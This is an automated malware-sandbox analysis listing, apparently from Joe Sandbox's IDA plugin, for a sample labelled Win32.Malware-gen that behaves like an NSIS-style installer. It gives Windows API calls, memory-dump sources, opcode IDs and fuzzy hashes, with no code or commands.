                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteValue
                                                                        • String ID:
                                                                        • API String ID: 2831762973-0
                                                                        • Opcode ID: bde766d8a503c3a1f1c2ee30d65442b77762dc6f840c34741ac6711ff670c9ae
                                                                        • Instruction ID: c9f6a0f756bffd6fe36e262df4a8f1e623fbd2bf401ec17ba930b5ce720ddf8f
                                                                        • Opcode Fuzzy Hash: bde766d8a503c3a1f1c2ee30d65442b77762dc6f840c34741ac6711ff670c9ae
                                                                        • Instruction Fuzzy Hash: B7F09632A04121ABE720ABB59B8EDAE62A89B50314F65443FF602B71C1D9F84D42566E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ShowWindow.USER32(0001048A), ref: 00401581
                                                                        • ShowWindow.USER32(00010484), ref: 00401596
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: 71b70274894262a9e0b78aae7c73bb9e80b78445945a1233e84b1a75d5d2188e
                                                                        • Instruction ID: cca44e48cc00dd3f2550ee43bfc29e9cf7f7b7f5bd80dc626c9b6d3a8a91cf8a
                                                                        • Opcode Fuzzy Hash: 71b70274894262a9e0b78aae7c73bb9e80b78445945a1233e84b1a75d5d2188e
                                                                        • Instruction Fuzzy Hash: B6E08676B10110ABC724CFA4ED9087F73A5EB843203A4043FE502B3290CA74AC018E78
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                                          • Part of subcall function 004065F5: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                                          • Part of subcall function 004065F5: wsprintfA.USER32 ref: 00406645
                                                                          • Part of subcall function 004065F5: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2547128583-0
                                                                        • Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                                        • Instruction ID: 42df78af1693d05b1f4151e300c7058424afa75421c13d02aa0b0909378b53c4
                                                                        • Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                                        • Instruction Fuzzy Hash: 7FE086326042106BD3105B755E0493B73AC9E997103020D3EF94AF2140D7399C32966D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                        • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                        • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                        • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,?,004059DD,?,?,00000000,00405BC0,?,?,?,?), ref: 00405DCA
                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                        • Instruction ID: 1444cfec4ca9bf1d34442b2169c12043b22736e773fd5239433e8f32ad8d098d
                                                                        • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                        • Instruction Fuzzy Hash: 6FD0C972504421ABC6112728EE0C89BBB55DB54271702CA36FDA5A26B1DB304C569A98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,004033A6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004058C1
                                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1375471231-0
                                                                        • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                        • Instruction ID: 3fc85bafe69b7557593d5765bf5919c43deceba34b0c9ea4212deea00e127d8c
                                                                        • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                        • Instruction Fuzzy Hash: 34C04C31214601EED6106B219E08B177BE5AB50741F25843E6646F00A0DE388469DA2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403368,00000000,00000000,00403192,000000FF,00000004,00000000,00000000,00000000), ref: 00405E76
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                        • Instruction ID: d159feaa40f66387c232a0365126d803d89e879c5a9a8176c13ce5bb2f202f1c
                                                                        • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                        • Instruction Fuzzy Hash: CFE0B63221025AAFDF109F95DC00AAB7B6CEB05260F144437FD99E6150D671E961DAE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040331E,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405EA5
Memory Dump Source
• Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
• Instruction ID: f6dbd1b2bb29cf3778f9da1b12eb4ab865b2d476cff05d6c6da3e568d4bed244
• Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
• Instruction Fuzzy Hash: CEE0EC3221165AABEF119F65DC00AEB7B6CEB05361F004836FA95E3150D631E9219BE4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040616B,?,?,?,?,00000002,ExecToStack), ref: 00406101
Memory Dump Source
• Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
• Instruction ID: acfb9daac442d6471bee54970dc50a73ebaac4160da87f0822be439bec8b4f66
• Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
• Instruction Fuzzy Hash: 01D0123204020DFBEF119F90DD05FAB3B1DAB08310F014426FE06A4091D776D530A724
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(0001047E,00000000,00000000,00000000), ref: 00404332
Memory Dump Source
• Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
• Instruction ID: 5c6e1af33eb05755d943f79c15c7bc1e123e6569ffc521d05fa768bf99fbbdf6
• Opcode Fuzzy Hash: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
• Instruction Fuzzy Hash: E9C09B717447017FEE20DB619D45F0777986760701F2544397751F60D0C674E410D61C
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00403379
Memory Dump Source
• Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
• Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
• Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
• Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
Memory Dump Source
• Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
• Instruction ID: 1318e1a831b13f4a694e23e2858010ee9933afb9cbbae162fbad06e3603bfc21
• Opcode Fuzzy Hash: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
• Instruction Fuzzy Hash: A9B09236284A00ABDA215B50DE09F4A7A72A768701F408039B240250B0CAB200A5EB18
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,004040D2), ref: 00404300
Memory Dump Source
• Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
• Instruction ID: f9921b4c88a1a0ed6e9c6eedf741b01f94502565facb500019f25752580a62db
• Opcode Fuzzy Hash: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
• Instruction Fuzzy Hash: C5A011B2000000AFCB02AB00EF08C0ABBA2ABA0300B008838A280800388B320832EB0A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003FB), ref: 004047B5
• SetWindowTextA.USER32(00000000,?), ref: 004047DF
• SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404890
• CoTaskMemFree.OLE32(00000000), ref: 0040489B
• lstrcmpiA.KERNEL32(ExecToStack,Drivelingly Setup: Installing), ref: 004048CD
• lstrcatA.KERNEL32(?,ExecToStack), ref: 004048D9
• SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048EB
  • Part of subcall function 00405951: GetDlgItemTextA.USER32(?,?,00000400,00404922), ref: 00405964
  • Part of subcall function 00406535: CharNextA.USER32(0000000B,*?|<>/":,00000000,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040658D
  • Part of subcall function 00406535: CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659A
  • Part of subcall function 00406535: CharNextA.USER32(0000000B,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659F
  • Part of subcall function 00406535: CharPrevA.USER32(0000000B,0000000B,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004065AF
• GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 004049A9
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C4
  • Part of subcall function 00404B1D: lstrlenA.KERNEL32(Drivelingly Setup: Installing,Drivelingly Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
  • Part of subcall function 00404B1D: wsprintfA.USER32 ref: 00404BC3
  • Part of subcall function 00404B1D: SetDlgItemTextA.USER32(?,Drivelingly Setup: Installing), ref: 00404BD6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: A$C:\Users\user\AppData\Local\Temp\Moviedom230$Drivelingly Setup: Installing$ExecToStack$Y,J
• API String ID: 2624150263-2995931047
• Opcode ID: 38a92cecc9cfb0f499b3f0b849dfcbf26f74d62f4bacbe9aff44cee51a7563e9
• Instruction ID: 575699f201696e67f0f9c35a0e1f8108b56c42fe30a04e4012ee5e208413707b
• Opcode Fuzzy Hash: 38a92cecc9cfb0f499b3f0b849dfcbf26f74d62f4bacbe9aff44cee51a7563e9
• Instruction Fuzzy Hash: 89A18FB1A00209ABDB11AFA6CD41AAF77B8AF84314F14843BF601B62D1D77C99518F6D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B9
Memory Dump Source
• Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
